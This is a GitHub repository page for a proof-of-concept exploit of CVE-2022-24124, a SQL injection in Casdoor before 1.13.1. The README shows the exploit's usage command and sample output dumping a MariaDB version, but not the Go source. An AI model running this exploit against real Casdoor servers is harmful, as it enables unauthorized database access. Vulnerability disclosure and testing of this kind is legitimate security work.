Skip to content

ColdFusionX/CVE-2022-24124

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.go
exploit.go
 
 

Repository files navigation

POC for CVE-2022-24124

Exploit Code for CVE-2022-24124 aka Casdoor SQL Injection

Exploit Links: [ExploitDB-50792] [PacketStormSecurity]

Expected outcome: Dump SQL database version on host running Casdoor < 1.13.1

Intended only for educational and testing in corporate environments.

Exploit Usage

Barricade➜ go run exploit.go -u http://127.0.0.1:8080

-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)

[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1

About

POC for CVE-2022-24124

Topics

exploit sqli sqlinjection casdoor

Resources

Readme

License

MIT license
Activity

Stars

9 stars

Watchers

1 watching

Forks

4 forks
Report repository

Languages